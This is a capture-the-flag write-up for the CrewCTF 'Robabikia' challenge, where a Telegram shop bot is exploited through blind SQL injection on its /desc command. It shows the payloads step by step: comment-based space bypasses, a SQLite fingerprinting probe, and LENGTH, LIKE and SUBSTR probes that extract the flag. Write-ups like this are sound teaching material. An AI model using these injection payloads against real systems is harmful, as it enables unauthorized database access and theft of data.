Tags: blindsqli telegram web 

Rating: 5.0

### Original writeup

## Robabikia (906 points)

### Description
In 70's my grandfather sold a flag but I think we lost the value of it, can you help us find it? Contact the seller: https://t.me/crewctf_Robabikia_bot

Author: omakmoh#1070


### Telegram bot
This challenge starts with messaging the telegram bot:
/items - Return the item list.
/price - Return the price of item.
/desc - Return the description of item.
/value - Return the value of item.
/help or /start - list available commands to use.
Use the command and specifiy the item ID
Listing the items:
1 - Broken Radio
2 - Fridge
3 - Goldstar TV
4 - Plastic Table
5 - Old Ancient FLAG
/price 5
/desc 5
The old ancient flag your Grandfather want.
Value (should be the flag):
/value 5
This feature currently Temporary Disabled

### SQL Injection confirmation
Probable SQL Injection:
/desc 1'
Error has been occured
Confirmed SQL Injection:
/desc 1' OR '
Radio to listen uninterrupted music, but need to fix
More complex queries like this didn't work:
/desc 1' OR (SELECT 1) OR '1
Error has been occured

### SQL Injection method discovery
In order to be able to run more complex queries that need SPACES, you can replace them with inline comments `/**/`, so this queries now let us determine DBMS:
/desc '/**/OR/**/@@version/**/--
Error has been occured

/desc '/**/OR/**/sqlite_version()/**/--
Radio to listen uninterrupted music, but need to fix
So, looks like a Blind SQL Injection on `desc` parameter, SQLite back-end.

As the challenge description states - we need to find the value of the flag (item 5). This query confirms we have `value` column in this table
/desc '/**/GROUP/**/BY/**/value--
Item not found

Let's find the length of the flag (hopefully):
/desc 5'/**/AND/**/LENGTH(value)>35
The old ancient flag your Grandfather want.

/desc 5'/**/AND/**/LENGTH(value)>50 --
Item not found

[after few queries...]

/desc 5'/**/AND/**/LENGTH(value)=47 --
The old ancient flag your Grandfather want.

Length of the flag is 47. We can pretty easily confirm, that this indeed is the flag by checking the first characters for the flag format:
/desc 5'/**/AND/**/value/**/LIKE/**/'crew%{%}' --
The old ancient flag your Grandfather want.

### Getting the flag
I have tried UNION Selects and spend few hours on trying to find quicker way, but I ended up in just using Blind SQL Injection to dump the flag
/desc 5'/**/AND/**/SUBSTR(value,1,1)/**/>/**/'a' --
The old ancient flag your Grandfather want.

It took me approx. 1 hour to dump the 47 (- 6 because of known format) characters long flag using Blind SQL Injection on the Telegram Bot.

For some reason, I feel satisfied. :D
/desc 5'/**/AND/**/value/**/LIKE/**/'crew{U53_fa57_WAY_1n_5QL_1nj3C710N_1N_t3l3_B0t}' --
The old ancient flag your Grandfather want.

Original writeup (https://github.com/Samik081/ctf-writeups/blob/master/CrewCTF%202022/web/robabikia.md).